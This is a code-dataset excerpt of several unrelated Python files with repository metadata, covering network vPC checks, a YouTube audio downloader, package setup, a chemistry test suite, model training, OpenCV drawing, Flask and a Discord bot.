from nxapi_netbox.netbox.netbox_session import netbox, get_device_mgmt_ip
from nxapi_netbox.vault.vault import get_vault
from nxapi_netbox.nxapi.nxapi_vpc_consistency import (
NxapiVpcConsistencyGlobal,
NxapiVpcConsistencyVni,
NxapiVpcConsistencyVlans,
NxapiVpcConsistencyInterface,
)
def get_parser():
help_interfaces = "a comma-separated list (no spaces) of port-channel interfaces to test for vpc consistency"
help_mismatched_labels = "display labels whose number of comma-separated entries differ from the number of values they refer to"
ex_interfaces = "Example: --interfaces Po1,Po10"
ex_mismatched_labels = "Example: --mismatched_labels"
parser = argparse.ArgumentParser(
description="DESCRIPTION: NXAPI: display inconsistent vpc parameters",
parents=[ArgsCookie, ArgsNxapiTools],
)
default = parser.add_argument_group(title="DEFAULT SCRIPT ARGS")
mandatory = parser.add_argument_group(title="MANDATORY SCRIPT ARGS")
parser.add_argument(
"--version", action="version", version="{} v{}".format("%(prog)s", our_version)
)
default.add_argument(
"--mismatched_labels",
dest="mismatched_labels",
required=False,
action="store_true",
default=False,
help="{} {}".format(help_mismatched_labels, ex_mismatched_labels),
)
default.add_argument(
"--interfaces",
dest="interfaces",
required=False,
default=None,
help="{} {}".format(help_interfaces, ex_interfaces),
)
return parser.parse_args()
def get_device_list():
try:
return cfg.devices.split(",")
except:
log.error(
"exiting. Cannot parse --devices {}. Example usage: --devices leaf_1,spine_2,leaf_2".format(
cfg.devices
)
)
exit(1)
def print_output(futures):
for future in futures:
output = future.result()
if output == None:
continue
for line in output:
print(line)
def show_inconsistent_params(ip, nx, interface=None):
lines = list()
if nx.error_reason != None:
log.error("{} {} error: {}".format(tb.sid, nx.hostname, nx.error_reason))
return lines
inconsistent_items = nx.inconsistent_params
if len(inconsistent_items) == 0:
if interface == None:
lines.append(
"{:<15} {:<20} all {} {} vpc params are consistent".format(
ip, nx.hostname, len(nx.info), nx.param_type
)
)
else:
lines.append(
"{:<15} {:<20} {} all {} {} vpc port-channel params are consistent".format(
ip, nx.hostname, interface, len(nx.info), nx.param_type
)
)
else:
for item in nx.inconsistent_params:
if interface == None:
lines.append(
"{:<15} {:<20} {}".format(ip, nx.hostname, item["vpc-param-name"])
)
else:
lines.append(
"{:<15} {:<20} {} {}".format(
ip, nx.hostname, interface, item["vpc-param-name"]
)
)
for key in item:
if key == "vpc-param-name":
continue
lines.append(" {}: {}".format(key, item[key]))
return lines
def show_mismatched_labels(ip, nx):
lines = list()
if cfg.mismatched_labels == False:
return lines
if len(nx.mismatched_info) > 0:
for label in nx.mismatched_info:
lines.append(
"{:<15} {:<20} vpc-param-name {}".format(ip, nx.hostname, label)
)
lines.append(" labels {}".format(nx.mismatched_info[label]["names"]))
lines.append(" values {}".format(nx.mismatched_info[label]["params"]))
return lines
def worker(device, vault):
ip = get_device_mgmt_ip(nb, device)
lines = list()
for class_name in [
NxapiVpcConsistencyGlobal,
NxapiVpcConsistencyVni,
NxapiVpcConsistencyVlans,
]:
nx = class_name(vault.nxos_username, vault.nxos_password, ip, log)
nx.nxapi_init(cfg)
nx.refresh()
if nx.error_reason != None:
lines.append("{} {} error: {}".format(ip, nx.hostname, nx.error_reason))
return lines
lines += show_inconsistent_params(ip, nx)
lines += show_mismatched_labels(ip, nx)
if cfg.interfaces == None:
return lines
for interface in cfg.interfaces.split(","):
nx = NxapiVpcConsistencyInterface(
vault.nxos_username, vault.nxos_password, ip, log
)
nx.nxapi_init(cfg)
nx.interface = interface
nx.refresh()
lines += show_inconsistent_params(ip, nx, interface)
return lines
cfg = get_parser()
log = get_logger(script_name, cfg.loglevel, "DEBUG")
vault = get_vault(cfg.vault)
vault.fetch_data()
nb = netbox(vault)
devices = get_device_list()
executor = ThreadPoolExecutor(max_workers=len(devices))
futures = list()
for device in devices:
args = [device, vault]
futures.append(executor.submit(worker, *args))
print_output(futures)
| allenrobel/nxapi-netbox | scripts/vpc_consistency.py | vpc_consistency.py | py | 6,995 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "nxapi_netbox.args.args_cookie.ArgsCookie",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "nxapi_netbox.args.args_nxapi_tools.ArgsNxapiTools",
"line_number": 63,
"... |
17791637310 | # Download the audio files for all of the video URLs given in the input file
import argparse
import os
import sys
youtube_cmd = \
"youtube-dl --extract-audio --audio-format mp3 -o \"{file_name}\" {url}"
def download_song(artist, song, url):
    """Download the audio track at *url* as an mp3 named after artist/song.

    The output template is ``<artist>__<song>.%(ext)s`` with whitespace in
    either part replaced by hyphens.  Returns True on success, False when
    youtube-dl fails or is not installed.
    """
    import subprocess
    artist_part = '-'.join(artist.lower().split())
    song_part = '-'.join(song.lower().split())
    file_name = artist_part + "__" + song_part + ".%(ext)s"
    # Invoke youtube-dl with an argument list (shell=False) so characters in
    # the URL or song metadata can never be interpreted by a shell — the
    # previous os.system() format string was injectable.
    try:
        result = subprocess.run(
            ["youtube-dl", "--extract-audio", "--audio-format", "mp3",
             "-o", file_name, url]
        )
    except FileNotFoundError:
        # youtube-dl is not on PATH; os.system would have returned non-zero.
        return False
    return result.returncode == 0
def mark_completed(f, line):
    """
    Mark the song on the current line in the given file as downloaded. Change
    the mark from `-` to `#`.

    Args:
        f (file) : A handle to the songs file, open at the current song
        line (bytes) : The currently read line (containing the song)

    Returns:
        Nothing

    NOTE: The file must be open in binary format: the relative seek below
    assumes ``len(line)`` equals the number of bytes consumed for this line,
    which only holds when iterating a binary-mode handle.
    """
    try:
        marker_position = line.decode().index("| -") + 2 # add 2 to reach `-`
        f.seek(-len(line), os.SEEK_CUR) # move back to the start of the current line
        f.seek(marker_position, os.SEEK_CUR) # move to the position of the marker
        f.write(b"#") # write the mark completed symbol (`-` -> `#`)
        f.readline() # move to the next line (read past the current `\n`)
    except ValueError:
        # Could not find `-` marker
        pass
    except Exception as e:
        # Here's a generic way for printing where the exception occurred
        # NOTE(review): this broad handler only logs; the file position may be
        # left mid-line afterwards — confirm callers tolerate that.
        _, _, e_traceback = sys.exc_info()
        print(f"Error:{e_traceback.tb_lineno}: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Download music from YouTube.")
parser.add_argument("-songs_file", type=str, help="list of songs to download")
parser.add_argument("-out_dir", type=str, help="download directory")
args = parser.parse_args()
if args.songs_file is None:
print("Please supply songs file")
exit(0)
elif args.out_dir is None:
print("Please supply download directory")
exit(0)
try:
os.listdir(args.out_dir)
except FileNotFoundError:
# Download directory does not exist, so create it
try:
os.mkdir(args.out_dir)
except:
print("Could not create download directory")
exit(0)
home_dir = os.getcwd()
with open(args.songs_file, 'rb+') as f:
# Move to download directory for placing songs
os.chdir(args.out_dir)
for line in f:
# Extract the song name and look up video, cleaning up white space
fields = [ field.strip() for field in line.decode().split('|') ]
song = fields[0]
artist = fields[1]
try:
url = fields[2]
try:
mark = fields[3]
if mark == '#':
print(f"Already downloaded: {song}")
continue
except IndexError:
# Song not marked with `-` or `#`
print(f"Mark not found: {song}")
continue
except IndexError:
# Cannot download this song
continue
if (download_song(artist, song, url)):
mark_completed(f, line)
if (home_dir != os.getcwd()):
# Return to original directory
os.chdir(home_dir)
| S0l0m4n/random-code | python/download_songs/youtube_download.py | youtube_download.py | py | 3,450 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "os.system",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.SEEK_CUR",
"line_number": 33,
"usage_type": "attribute"
},
{
"api_name": "os.SEEK_CUR",
"line_number": 34,
"usage_type": "attribute"
},
{
"api_name": "sys.exc_info",
"line_... |
15422153495 | from os import path
from setuptools import setup
# read the contents of your description file
# (used as the PyPI long description so the project page renders the README)
this_directory = path.abspath(path.dirname(__file__))
with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()

setup(
    name="pyswahili",
    version="0.1.4",
    description="""
    Python package for briding python english keywords
    with swahili one to allow swahili speakers to learn the basics of coding
    without ever knowing english
    """,
    long_description=long_description,
    long_description_content_type='text/markdown',
    url="https://github.com/Kalebu/pyswahili",
    # NOTE(review): download_url still points at the 0.1 tag while `version`
    # is 0.1.4 — confirm the release tag this should reference.
    download_url='https://github.com/Kalebu/pyswahili/releases/tag/0.1',
    author="Jordan Kalebu",
    author_email="isaackeinstein@gmail.com",
    license="MIT",
    packages=["pyswahili"],
    keywords=[
        "pyswahili",
        "python-tanzania",
        "python-transpiler",
        "swahili-python",
        "python in swahili",
        "python for swahili speakers",
        "code python in swahili",
        "swahili programming language",
        "program in swahili",
    ],
    # Installs the `pyswahili` command, dispatching to pyswahili/__main__.py.
    entry_points={
        "console_scripts": [
            "pyswahili = pyswahili.__main__:main"
        ]
    },
    classifiers=[
        "Development Status :: 3 - Alpha",
        "Intended Audience :: Developers",
        "Topic :: Software Development :: Build Tools",
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: 3.8",
        "Programming Language :: Python :: 3.9",
    ]
)
| Kalebu/pyswahili | setup.py | setup.py | py | 1,661 | python | en | code | 79 | github-code | 6 | [
{
"api_name": "os.path.abspath",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "os.path.dirname",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number"... |
37182738964 | from abc import ABC, abstractmethod
from typing import List
import requests
from config import EnvConfig
from models.Note import Card, DeckServiceCard
class DeckServiceAPIInterface(ABC):
    """Abstract contract for persisting generated cards in the deck service."""

    @abstractmethod
    def save_cards(self, user_id: str, deck_id: str, cards: List[Card]):
        """Store *cards* in deck *deck_id* on behalf of *user_id*."""
        pass
class DeckServiceAPI(DeckServiceAPIInterface):
    """HTTP client for the deck service's card-creation endpoint."""

    def __init__(self, config: EnvConfig):
        self.DECK_SERVICE_HOST_NAME = config.DECK_SERVICE_HOST_NAME

    def save_cards(
        self, user_id: str, deck_id: str, cards: List[Card]
    ) -> List[DeckServiceCard]:
        """POST *cards* to the deck service and return the stored records."""
        endpoint = (
            f"http://{self.DECK_SERVICE_HOST_NAME}"
            f"/decks/{deck_id}/cards?userID={user_id}"
        )
        payload = [{"deckID": deck_id, **card} for card in cards]

        response = requests.post(endpoint, json=payload)
        if response.status_code != 201:
            message = (
                f"Failed to save cards. Status code: {response.status_code}."
                f" Response: {response.json()}"
            )
            raise Exception(message)

        saved: List[DeckServiceCard] = response.json()["data"]
        return saved
| MoShrank/card-generation-service | external/DeckServiceAPI.py | DeckServiceAPI.py | py | 1,105 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "abc.ABC",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "typing.List",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "models.Note.Card",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "abc.abstractmethod",
"line_nu... |
910883870 | import numpy as np, h5py as h5
from horton import * # pylint: disable=wildcard-import,unused-wildcard-import
from horton.part.test.common import get_proatomdb_cp2k
from horton.test.common import tmpdir
def test_db_basics():
padb = ProAtomDB.from_refatoms(numbers=[8, 1], max_cation=1, max_anion=1)
assert padb.get_numbers() == [1, 8]
assert padb.get_charges(8) == [1, 0, -1]
assert padb.get_charges(1) == [0, -1]
r1 = padb.get_record(8, -1)
assert r1.number == 8
assert r1.charge == -1
assert abs(r1.energy - -72.587) < 1e-3
assert r1.ipot_energy == padb.get_record(8, 0).energy - r1.energy
assert r1.population == 9
assert r1.pseudo_number == 8
assert r1.pseudo_population == 9
assert r1.safe
assert r1.rgrid.size == 59
r2 = padb.get_record(8, -1)
r3 = padb.get_record(8, 0)
assert r1 == r2
assert r1 != r3
assert padb.get_rgrid(8) is r1.rgrid
assert padb.get_record(8, +1).ipot_energy is None
assert padb.get_record(8, -1).ipot_energy == padb.get_record(8, 0).energy - padb.get_record(8, -1).energy
assert padb.get_record(1, 0).ipot_energy == -padb.get_record(1, 0).energy
def test_db_basics_pseudo():
padb = get_proatomdb_cp2k()
assert padb.get_numbers() == [8, 14]
assert padb.get_charges(8) == [2, 1, 0, -1, -2]
assert padb.get_charges(8, safe=True) == [2, 1, 0, -1]
assert padb.get_charges(14) == [0]
assert not padb.get_record(8, -2).safe
assert padb.get_rgrid(8) is padb.get_record(8, -2).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, -1).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, 0).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, 1).rgrid
assert padb.get_rgrid(8) is padb.get_record(8, 2).rgrid
r1 = padb.get_record(8, -1)
assert r1.safe
assert abs(r1.energy - -15.866511882272) < 1e-8
assert abs(r1.ipot_energy - (padb.get_record(8, 0).energy - r1.energy)) < 1e-5
r2 = padb.get_record(8, -2)
assert not r2.safe
assert abs(r2.energy - -15.464982778766) < 1e-8
assert abs(r2.ipot_energy - (r1.energy - r2.energy)) < 1e-5
assert padb.get_record(8, +2).ipot_energy is None
def test_record_basics_pseudo():
fn_out = context.get_fn('test/atom_si.cp2k.out')
mol = IOData.from_file(fn_out)
r = ProAtomRecord.from_iodata(mol)
assert r.number == 14
assert r.charge == 0
assert abs(r.energy - -3.761587698067) < 1e-10
assert r.ipot_energy is None
assert r.population == 14
assert r.pseudo_number == 4
assert r.pseudo_population == 4
assert r.safe
def compare_padbs(padb1, padb2):
    """Assert that two pro-atom databases contain identical records."""
    assert padb1.size == padb2.size
    for number in padb1.get_numbers():
        for charge in padb1.get_charges(number):
            assert padb1.get_record(number, charge) == padb2.get_record(number, charge)
def test_io_group():
padb1 = ProAtomDB.from_refatoms(numbers=[1, 6], max_cation=1, max_anion=1)
assert padb1.size == 5
keys = sorted(padb1._map.keys())
assert keys == [(1, -1), (1, 0), (6, -1), (6, 0), (6, +1)]
with h5.File('horton.dpart.test.test_proatomdb.test_io_group', "w", driver='core', backing_store=False) as f:
padb1.to_file(f)
padb2 = ProAtomDB.from_file(f)
compare_padbs(padb1, padb2)
def test_io_filename():
padb1 = ProAtomDB.from_refatoms(numbers=[1, 6], max_cation=1, max_anion=0)
keys = sorted(padb1._map.keys())
assert keys == [(1, 0), (6, 0), (6, 1)]
with tmpdir('horton.dpart.test.test_proatomdb.test_io_filename') as dn:
filename = '%s/test.h5' % dn
padb1.to_file(filename)
padb2 = ProAtomDB.from_file(filename)
compare_padbs(padb1, padb2)
def test_compute_radii():
rgrid = RadialGrid(ExpRTransform(1e-3, 1e1, 100))
padb = ProAtomDB.from_refatoms([1, 6], 0, 0, (rgrid, 110))
record = padb.get_record(6, 0)
indexes, radii = record.compute_radii([2.0, 5.9, 5.999])
assert (indexes == [68, 89, 100]).all()
assert abs(radii - np.array([0.522305, 3.595831, 10.0])).max() < 1e-5
def test_moments():
    """The 3rd radial moment of neutral O must exceed that of the O+ cation
    (removing an electron contracts the density), with reference values."""
    padb = get_proatomdb_cp2k()
    record0 = padb.get_record(8, 0)
    record1 = padb.get_record(8, 1)
    m0 = record0.get_moment(3)
    m1 = record1.get_moment(3)
    assert m0 > m1
    assert abs(m0-21.84) < 1e-2
    assert abs(m1-12.17) < 1e-2
def check_spline_record(spline, record):
    """Assert the spline reproduces the record's density and its derivative."""
    for spline_data, record_data in ((spline.y, record.rho), (spline.dx, record.deriv)):
        assert abs(spline_data - record_data).max() < 1e-10
def check_spline_pop(spline, pop):
    """Assert that radially integrating the spline recovers *pop* electrons:
    4*pi * sum(dr/dt * r**2 * rho) over the transformed grid."""
    rtf = spline.rtransform
    integral = 4 * np.pi * dot_multi(
        rtf.get_deriv(),
        rtf.get_radii() ** 2,
        spline.y,
    )
    assert abs(pop - integral) < 1e-2
def check_spline_mono_decr(spline):
    """Assert that the spline decreases monotonically up to the point where
    the density is numerically zero.

    Every relative step ``(y[i+1]-y[i])/y[i]`` must be (numerically)
    non-positive, i.e. the *maximum* relative step stays below tolerance.
    """
    t = np.arange(0, spline.rtransform.npoint, 0.1)
    x = spline.rtransform.radius(t)
    y = spline(x)
    # Truncate at the first numerically-zero point so the relative
    # differences below never divide by (near-)zero. Previously this indexed
    # nonzero()[0][0] unconditionally, which raised IndexError for a density
    # that never reaches zero on the sampled grid.
    zero_indexes = (abs(y) < 1e-10).nonzero()[0]
    if len(zero_indexes) > 0:
        y = y[:zero_indexes[0]]
    # Bug fix: the original asserted ``.min() < 1e-9``, which only checks the
    # single steepest step and is satisfied by any curve with at least one
    # decreasing interval. Monotonic decrease requires *all* relative steps
    # to be non-positive, i.e. the maximum must be below tolerance.
    assert ((y[1:] - y[:-1])/y[:-1]).max() < 1e-9
def test_get_spline():
padb = ProAtomDB.from_refatoms(numbers=[1, 6], max_cation=1, max_anion=1)
spline = padb.get_spline(6)
check_spline_pop(spline, 6.0)
check_spline_record(spline, padb.get_record(6, 0))
check_spline_mono_decr(spline)
spline = padb.get_spline(6, -1)
check_spline_pop(spline, 7.0)
check_spline_record(spline, padb.get_record(6, -1))
check_spline_mono_decr(spline)
spline = padb.get_spline(6, {0:0.5, -1:0.5})
check_spline_pop(spline, 6.5)
check_spline_mono_decr(spline)
spline = padb.get_spline(1, {0:0.5})
check_spline_pop(spline, 0.5)
check_spline_mono_decr(spline)
def test_get_spline_pseudo():
padb = get_proatomdb_cp2k()
spline = padb.get_spline(8)
check_spline_pop(spline, 6.0)
check_spline_record(spline, padb.get_record(8, 0))
spline = padb.get_spline(8, -1)
check_spline_pop(spline, 7.0)
check_spline_record(spline, padb.get_record(8, -1))
spline = padb.get_spline(8, {0:0.5, -1:0.5})
check_spline_pop(spline, 6.5)
spline = padb.get_spline(14)
check_spline_pop(spline, 4.0)
check_spline_record(spline, padb.get_record(14, 0))
def test_compact():
    """compact() with a 0.1 threshold must shrink the radial grids well below
    their original sizes for both elements in the CP2K test database."""
    padb = get_proatomdb_cp2k()
    padb.compact(0.1)
    assert padb.get_rgrid(8).size < 100
    assert padb.get_rgrid(14).size < 100
def test_normalize():
    """After compact()+normalize(), every record must integrate to its exact
    integer (pseudo) electron count."""
    padb = get_proatomdb_cp2k()
    padb.compact(0.1)
    padb.normalize()
    for number in padb.get_numbers():
        rgrid = padb.get_rgrid(number)
        for charge in padb.get_charges(number):
            r = padb.get_record(number, charge)
            nel = rgrid.integrate(r.rho)
            # Expected population for pseudo-potential atoms: valence minus charge.
            nel_integer = r.pseudo_number - charge
            assert abs(nel - nel_integer) < 1e-10
def test_empty_proatom():
    """An empty coefficient dict must yield an identically zero pro-atom density."""
    padb = get_proatomdb_cp2k()
    assert (padb.get_rho(8, {}) == 0.0).all()
def test_io_atdens():
padb = ProAtomDB.from_file(context.get_fn('test/pro.atdens'))
assert padb.get_numbers() == [16]
assert padb.get_charges(16) == [3, 2]
r = padb.get_record(16, 3)
assert abs(r.rho[0] - 0.2628105459E+04) < 1e-5
assert abs(r.rho[-1] - 0.1998952826E-16) < 1e-5
s = padb.get_spline(16, 3)
assert abs(s(np.array([0.0])) - 2661.68659449) < 1e-5
radii = r.rgrid.rtransform.get_radii()
assert radii[0] == 0.5216488380E-03
assert abs(radii[-1] - 20) < 1e-14
assert abs(radii[1] - 0.5442350204E-03) < 1e-8
assert abs(r.rgrid.integrate(r.rho) - 13) < 1e-3
# check the basics of the get_rho method (charge)
rho1 = padb.get_rho(16, 3)
rho2, deriv = padb.get_rho(16, 3, do_deriv=True)
assert (rho1 == rho2).all()
assert deriv is None
# check the basics of the get_rho method (dict)
rho1 = padb.get_rho(16, {3:1})
rho2, deriv = padb.get_rho(16, {3:1}, do_deriv=True)
assert (rho1 == rho2).all()
assert deriv is None
| theochem/horton | horton/part/test/test_proatomdb.py | test_proatomdb.py | py | 7,845 | python | en | code | 83 | github-code | 6 | [
{
"api_name": "horton.part.test.common.get_proatomdb_cp2k",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "h5py.File",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "horton.test.common.tmpdir",
"line_number": 96,
"usage_type": "call"
},
{
"ap... |
36767766109 | '''
Author : knight_byte
File : A_Die_Roll.py
Created on : 2021-04-14 09:25:32
'''
from fractions import Fraction
def main():
    """Read the two visible die faces and print the winning probability
    as a reduced fraction (with the special-cased certain outcome '1/1')."""
    faces = [int(part) for part in input().split()]
    # Number of faces that are at least as large as the best shown face.
    favourable = 7 - max(faces)
    print("1/1" if favourable == 6 else Fraction(favourable, 6))


if __name__ == '__main__':
    main()
| arbkm22/Codeforces-Problemset-Solution | Python/A_Die_Roll.py | A_Die_Roll.py | py | 284 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "fractions.Fraction",
"line_number": 12,
"usage_type": "call"
}
] |
33625318941 | from util import logging
from training.util import monitor_loss
import tensorflow as tf
import streamlit as st
import os
import time
import numpy as np
import pandas as pd
def batch_loss(model, inp, aux, targ, loss_funct, opt = None):
    """Compute the loss on one mini-batch; when an optimizer is given, also
    apply a gradient step and checkpoint the model.

    Args:
        model: the Keras-style model called as model(inp, aux, training=True).
        inp, aux: main and auxiliary inputs for the model.
        targ: target values compared against the prediction.
        loss_funct: callable (targets, predictions) -> loss tensor.
        opt: optimizer; None means evaluation only (no update, no checkpoint).

    Returns:
        The batch loss tensor.
    """
    loss = 0
    # Record the forward pass so gradients can be taken w.r.t. the variables.
    with tf.GradientTape() as tape:
        pred = model(inp, aux, training=True)
        loss = loss_funct(targ, pred)
    if opt is not None:
        variables = model.trainable_variables
        gradients = tape.gradient(loss, variables)
        opt.apply_gradients(zip(gradients, variables))
        #save model eager tf
        # NOTE(review): a checkpoint is written on *every* training batch,
        # which is expensive; consider saving once per epoch instead.
        checkpoint_dir = 'trained_model_dir'
        if not os.path.exists(checkpoint_dir):
            os.makedirs(checkpoint_dir)
        checkpoint_prefix = os.path.join(checkpoint_dir, "ckpt")
        root = tf.train.Checkpoint(optimizer=opt,
                                   model=model)
        root.save(checkpoint_prefix)
    return loss
def training(model, nb_epochs, step_epoch, train_set, valid_set, loss_fct, valid_loss_fct, opt, patience, min_delta):
    """Train *model* with per-epoch validation, live Streamlit charting and
    early stopping.

    Args:
        model: model passed through to batch_loss().
        nb_epochs: maximum number of epochs.
        step_epoch: batches taken from each dataset per epoch.
        train_set, valid_set: tf.data datasets yielding ((inp, aux), targ).
        loss_fct, valid_loss_fct: training / validation loss callables.
        opt: optimizer used for the training batches.
        patience, min_delta: early-stopping knobs forwarded to monitor_loss().

    Returns:
        The trained model.
    """
    # Keep results for plotting
    train_loss_results = []
    valid_loss_results = []
    steps_per_epoch = step_epoch
    # early stopping
    patience_cnt = 0
    logging.info('Training started...')
    start = time.time()
    # Live chart that accumulates one (train, valid) loss pair per epoch.
    df = pd.DataFrame({'Loss': [], 'Loss Val': []})
    chart = st.line_chart(df)
    for epoch in range(nb_epochs):
        ## training
        epoch_loss_avg = tf.keras.metrics.Mean()
        for (batch, (inp_tot, targ)) in enumerate(train_set.take(steps_per_epoch)):
            # define encoder and decoder inputs
            inp, aux = inp_tot[0], inp_tot[1]
            # loss for batch
            batch_loss_results = batch_loss(model, inp, aux, targ, loss_fct, opt)
            # training progress
            epoch_loss_avg.update_state(batch_loss_results)
        # collect training loss values
        train_loss_results.append(epoch_loss_avg.result())
        _Loss = epoch_loss_avg.result().numpy()
        ## validation (opt=None: no gradient step, no checkpoint)
        epoch_valid_loss_avg = tf.keras.metrics.Mean()
        for (batch, (inp_tot, targ)) in enumerate(valid_set.take(steps_per_epoch)):
            inp, aux = inp_tot[0], inp_tot[1]
            batch_loss_results = batch_loss(model, inp, aux, targ, valid_loss_fct, None)
            epoch_valid_loss_avg.update_state(batch_loss_results)
        # collect training loss values
        valid_loss_results.append(epoch_valid_loss_avg.result())
        ValLoss = epoch_valid_loss_avg.result().numpy()
        df = pd.DataFrame({'Loss': [_Loss],
                           'Loss Val': [ValLoss]})
        chart.add_rows(df)
        # early stopping
        patience_cnt = monitor_loss(epoch, valid_loss_results, min_delta, patience_cnt)
        if patience_cnt > patience:
            logging.info("early stopping...")
            break
        if epoch % 50 == 0: #logging.info
            st.text("Epoch {}: Loss MAE: {:.5f} --- Val Loss MAE: {:.5f}".format(epoch,
                                                                                 epoch_loss_avg.result(),
                                                                                 epoch_valid_loss_avg.result()))
    logging.info('Time taken to train {} sec\n'.format(time.time() - start))
    logging.info('Training finished...')
    return model
| giobbu/ML-streamlit-apps | geo-ML/road-traffic-forecasting-belgium/training/train_module.py | train_module.py | py | 3,373 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "tensorflow.GradientTape",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 24,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
... |
34832241170 | import cv2
import numpy as np

# All-zero pixels in every BGR channel -> a black 600x600 canvas.
img = np.zeros((600, 600, 3), np.uint8)
"""
img.shape[1]代表图片的宽度
img.shape[0]代表图片的高度(长度)
"""
# (Translation of the note above: img.shape[1] is the image width,
#  img.shape[0] is the image height.)

# Draw a line. Args: image, start point, end point, colour (BGR), thickness.
cv2.line(img, (0,0), (img.shape[1], img.shape[0]), (255,255,255), 2)

# Draw rectangles (cv2.FILLED fills the shape).
# Args: image, top-left corner, bottom-right corner, colour, thickness.
cv2.rectangle(img, (100, 100), (200, 200), (0,255,255), 2)
cv2.rectangle(img, (400, 400), (500, 500), (0,255,255), cv2.FILLED)

# Draw a circle. Args: image, centre, radius, colour, thickness.
cv2.circle(img, (300, 300), 100, (0,0,255), 2)

# Draw an ellipse. Args: image, centre, (horizontal semi-axis, vertical
# semi-axis), rotation angle, start angle, end angle, colour, thickness.
cv2.ellipse(img , (300, 300), (50, 100), 45, 0, 360, (255, 0, 0), cv2.FILLED)

# Render text (no CJK support in Hershey fonts). Args: image, text,
# bottom-left coordinate of the text, font, scale, colour, thickness.
cv2.putText(img, "Hello", (300, 300), cv2.FONT_HERSHEY_COMPLEX, 1, (255,255,255), 1)

cv2.imshow("img", img)
cv2.waitKey(0) | jim2832/Image-Recognition | draw.py | draw.py | py | 1,114 | python | zh | code | 0 | github-code | 6 | [
{
"api_name": "numpy.zeros",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "numpy.uint8",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "cv2.line",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "cv2.rectangle",
"line_number"... |
4352669045 | from flask import Flask, render_template, request, redirect, session
app = Flask(__name__)
app.secret_key = "No secrets on github or youtube"
@app.route('/')
def index():
return render_template('index.html')
@app.route('/submit', methods=['POST'])
def submit():
print(request.form)
session['name'] = request.form['name']
session['age'] = request.form['age']
return redirect('/display')
@app.route('/display')
def display():
    """Render the display page with the name and age stored in the session."""
    name = session['name']
    # Bug fix: age must be read from the session; the previous code indexed
    # the `submit` view function (`submit['age']`), which raises TypeError
    # at request time.
    return render_template('display.html', name=name, age=session['age'])
if __name__ == '__main__':
app.run(debug = True) | kwersland/coding_dojo-Python | flask/fundamentals/post_form/server.py | server.py | py | 601 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "flask.Flask",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "flask.request.form",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "flask.request... |
23312692887 | import discord
import os
from data_loader import input_text_parser
from data_loader import input_image_parser
image_path = "./images"
text_path = "./text"
# Read the bot token; a context manager guarantees the file handle is
# closed (the previous one-liner leaked it).
with open("token.txt", "r") as token_file:
    token = token_file.read()

# change cwd in case this is called from shell script
os.chdir(os.path.dirname(os.path.abspath(__file__)))

# create data objects, reading in data
text_data = input_text_parser(text_path)
file_data = input_image_parser(image_path)

client = discord.Client(intents=discord.Intents.all())
@client.event
async def on_ready():
    """Log once the bot has finished connecting to Discord."""
    print(f'{client.user} has connected to Discord')
@client.event
async def on_message(message):
    """
    Main work method, called whenever someone posts a message.

    Commands start with '!': '!encyclopedia bottanica' (about), '!toc' /
    '!contents' (index), or '!<entry name>' (look up text and/or a file).
    """
    # don't respond to self, empty messages, or messages that don't start with a bang
    if message.author == client.user or \
       len(message.content) == 0 or \
       message.content[0] != '!':
        return
    out_str = None
    out_file = None
    # clean message
    cmd = message.content[1:].strip().lower()
    # bot info
    if cmd == "encyclopedia bottanica":
        out_str = "I am an encyclopedia. Enter '!toc' or '!contents' for a table of contents.\n" + \
                  "Enter '!<entry name>' to view an entry. I am case-insensitive."
    # user requests table of contents
    # Bug fix: these branches must be mutually exclusive. Previously this was
    # a second independent `if ... else`, so the "encyclopedia bottanica"
    # reply above was immediately overwritten by the else branch's lookup.
    elif cmd == "contents" or cmd == "toc":
        out_str = f"I have information on the following categories:\n{text_data.get_contents()}\n" + \
                  f"and can share the following files:\n{file_data.get_contents()}"
    else:
        # get usual output
        out_str = text_data.get(cmd)
        out_file = file_data.get(cmd)
    # print results
    if out_file != None:
        await message.channel.send(file=out_file)
    if out_str != None:
        await message.channel.send(out_str)
# fire this bad boy up
client.run(token) | WireHallMedic/Encyclopedia-Bottanica | encyclopedia_bottanica.py | encyclopedia_bottanica.py | py | 1,802 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "os.chdir",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_num... |
28352614903 | from django.shortcuts import render, HttpResponseRedirect, HttpResponse
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.auth import login, authenticate, logout
from django.core.context_processors import csrf
from django.views.decorators.csrf import csrf_protect
